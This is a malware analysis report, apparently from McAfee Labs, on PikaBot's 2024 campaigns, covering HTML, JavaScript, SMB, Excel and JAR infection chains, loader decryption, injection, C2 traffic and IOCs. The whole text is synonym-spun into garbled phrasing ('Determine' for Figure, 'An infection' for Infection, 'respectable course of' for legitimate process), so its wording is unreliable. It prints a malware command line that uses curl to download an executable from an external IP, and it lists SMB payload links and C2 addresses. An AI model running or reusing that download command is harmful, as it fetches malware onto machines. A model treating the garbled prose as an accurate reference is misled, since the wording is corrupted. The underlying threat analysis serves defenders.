Authored by Anuradha and Preksha
Introduction
PikaBot is a malicious backdoor that has been energetic since early 2023. Its modular design is comprised of a loader and a core element. The core module performs malicious operations, permitting for the execution of instructions and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module right into a respectable course of. Notably, PikaBot employs distribution strategies, campaigns, and habits paying homage to Qakbot.
Distribution Strategies
PikaBot, together with varied different malicious loaders like QBot and DarkGate, closely depends upon e-mail spam campaigns for distribution. Its preliminary entry methods are intricately crafted, using geographically focused spam emails tailor-made for particular nations. These emails ceaselessly embody hyperlinks to exterior Server Message Block (SMB) shares internet hosting malicious zip recordsdata.
SMB shares consult with sources or folders on a server or pc accessible to different units or customers on a community utilizing the SMB protocol. The risk actors ceaselessly exploit such shares for malware distribution. On this occasion, the act of downloading and opening the supplied zip file results in PikaBot an infection.
Distinctive Campaigns
Throughout February 2024, McAfee Labs noticed a major change within the campaigns that distribute Pikabot.
Pikabot is distributed by means of a number of file sorts for varied causes, relying on the goals and nature of the assault. Utilizing a number of file sorts permits attackers to take advantage of numerous assault vectors. Totally different file codecs could have completely different vulnerabilities, and alternative ways of detection by safety software program so attackers could strive varied codecs to extend their possibilities of success and evade detection by bypassing particular safety measures.
Attackers typically use file sorts which can be generally trusted by customers, reminiscent of Zip or Workplace paperwork, to trick customers into opening them. By utilizing acquainted file sorts, attackers enhance the chance that their targets will work together with the malicious content material. Malware authors use HTML with JavaScript options as attachments, a standard approach, notably when e-mail formatting is transformed to plain textual content, ensuing within the attachment of the HTML content material on to the e-mail. Attackers use SMB to propagate throughout the community and will particularly goal SMB shares to unfold their malware effectively. Pikabot takes benefit of the MonikerLink bug and attaches an SMB hyperlink within the Outlook mail itself.
Determine 1. Distinctive Campaigns of Pikabot
Attackers demonstrated a various vary of strategies and an infection vectors in every marketing campaign, aiming to ship the Pikabot payload. Under we’ve got summarized the an infection vector that has been utilized in every marketing campaign.
- HTML
- Javascript
- SMB Share
- Excel
- JAR
It’s unusual for an adversary to deploy so many assault vectors within the span of a month.
Marketing campaign Evaluation
On this part, a complete breakdown of the evaluation for every marketing campaign is introduced beneath.
1.HTML Marketing campaign
On this marketing campaign, Pikabot is distributed by means of a zipper file that features an HTML file. This HTML file then proceeds to obtain a textual content file, in the end ensuing within the deployment of the payload.
The beneath HTML code is a snippet from the malware the place it’s a correctly aligned HTML that has a physique meta redirection to a distant textual content file hosted on the specified URL. There are distractions within the HTML which aren’t rendered by the browser.
Determine 2.HTML Code
The above highlighted meta tag triggers a direct refresh of the web page and redirects the browser to the desired URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’. This seems to be a file URL, pointing to a textual content file on a distant server.
Listed here are some explanation why an attacker would possibly select a meta tag refresh over conventional redirects:
Stealth and Evasion: Meta tag refreshes could be much less conspicuous than HTTP redirects. Some safety instruments and detection mechanisms could also be extra centered on figuring out and blocking recognized redirect patterns.
Shopper-Aspect Execution: Meta tag refreshes happen on the consumer aspect (within the person’s browser), whereas HTTP redirects are sometimes dealt with by the server. This will likely enable attackers to execute sure actions immediately on the person’s machine, making detection and evaluation more difficult.
Dynamic Habits: Meta tag refreshes could be dynamically generated and inserted into internet pages, permitting attackers to alter the redirection targets extra simply and ceaselessly. This dynamic habits could make it tougher for safety techniques to maintain up with the evolving risk panorama.
On this marketing campaign, McAfee blocks the HTML file.
Determine 3.HTML file
2. Javascript Marketing campaign
Distributed by means of a compressed zip file, the bundle features a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.
An infection Chain:
.zip->.js->curl->.exe
Code snippet of .js file:
Determine 4. Javascript Code
When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to obtain the payload.
Because the URL “hxxp://103.124.105.147/KNaDVX/.dat” is inactive, the payload will not be downloaded to the beneath location.
Commandline:
‘”C:WindowsSystem32cmd.exe” /c mkdir C:DthfgjhjfjRkfjsilEjkjhdgjfByfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat –output C:DthfgjhjfjRkfjsilEjkjhdgjfByfjgkgdfhNgjhjhjda.exe’
McAfee blocks each the javascript and the exe file thus rendering McAfee prospects secure from this marketing campaign.
Determine 5. JS file
Determine 6. EXE file
3. SMB share Marketing campaign:
On this marketing campaign, Malware leverages the MonikerLink bug by distributing malware by means of e-mail conversations with older thread discussions, whereby recipients obtain a hyperlink to obtain the payload from an SMB share. The hyperlink is immediately current in that Outlook mail.
An infection Chain:
EML ->SMB share link->.zip->.exe
Spam E mail:
Determine 7. Spam e-mail with SMB share hyperlink
SMB Share hyperlink: file://newssocialwork.com/public/FNFY.zip
On this marketing campaign, McAfee efficiently blocks the executable file downloaded from the SMB share.
Determine 8. EXE file
4: Excel Marketing campaign
Determine 9. Face in Excel
An infection Chain:
.zip >.xls > .js > .dll
This week, risk actors launched a novel methodology to distribute their Pikabot malware. Focused customers obtained an Excel spreadsheet that prompted them to click on on an embedded button to entry “recordsdata from the cloud.”
Upon hovering over the “Open” button, we are able to discover an SMB file share hyperlink -file:///85.195.115.20sharereports_02.15.2024_1.js.
Bundled recordsdata in Excel:
Determine 10. Bundled recordsdata inside Excel
The Excel file doesn’t incorporate any macros however features a hyperlink directing to an SMB share for downloading the JavaScript file.
The hyperlink is current within the beneath relationship file.
Determine 11. XML relationship file
Content material of relationship file:
Determine 12. xl/drawings/_rels/drawing1.xml.rels
Code of JS file:
Determine 13. Obfuscated javascript code
The JS file accommodates largely junk codes and a small piece of malicious code which downloads the payload DLL file saved as “nh.jpg”.
Determine 14. Calling regsvr32.exe
The downloaded DLL payload is executed by regsvr32.exe.
On this marketing campaign, McAfee blocks the XLSX file.
Determine 15. XLSX file
5. JAR Marketing campaign
On this marketing campaign, distribution was by means of a compressed zip file, the bundle features a .jar file which on execution drops the DLL file as payload.
An infection Chain:
.zip>.jar>.dll
On extraction, the beneath recordsdata are discovered contained in the jar file.
Determine 16. Extraction of JAR file
The MANIFEST file signifies that hBHGHjbH.class serves as the primary class within the supplied recordsdata.
The jar file on execution masses the file “163520” as a useful resource and drops it as .png to the %temp% location which is the payload DLL file.
Determine 17. Payload with .png extension
Following this, java.exe initiates the execution of regsvr32.exe to run the payload.
On this marketing campaign, McAfee blocks each the JAR and DLL recordsdata.
Determine 18. JAR file
Determine 19. DLL file
Pikabot Payload Evaluation:
Pikabot loader:
Resulting from a comparatively excessive entropy of the useful resource part, the pattern seems packed.
Determine 20. Loader Entropy
Initially, Malware allocates reminiscence utilizing VirtualAlloc (), and subsequently, it employs a customized decryption loop to decrypt the information, leading to a PE file
Determine 21. Decryption Loop
Determine 22. Decrypted to get the PE file
Core Module:
As soon as the information is decrypted, it proceeds to leap to the entry level of the brand new PE file. When this PE file will get executed, it injects the malicious content material in ctfmon.exe with the command line argument “C:WindowsSysWOW64ctfmon.exe -p 1234”
Determine 23. Injection with ctfmon.exe
To forestall double an infection, it employs a hardcoded mutex worth {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), adopted by a name to GetLastError() to verify the final error code.
Determine 24. Mutex
Community communication:
Malware collects the information from the sufferer machine and sends it to the C2 server.
Determine 25. Community exercise
PIKABOT performs community communication over HTTPS on non-traditional ports (2221, 2078, and so forth).
Determine 26. Community exercise
C2 server communication:
Determine 27. C2 communication
IOCs:
C2 discovered within the payload are:
178.18.246.136:2078
86.38.225.106:2221
57.128.165.176:1372
File Sort | SHA 256 |
ZIP | 800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a |
HTML | 9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82 |
ZIP | 4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd |
JS | 9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849 |
EXE | 89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9 |
ZIP | f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512 |
EXE | aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1 |
XLSX | bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5 |
JS | 49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72 |
ZIP | d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04 |
JAR | d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4 |
DLL | 7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e |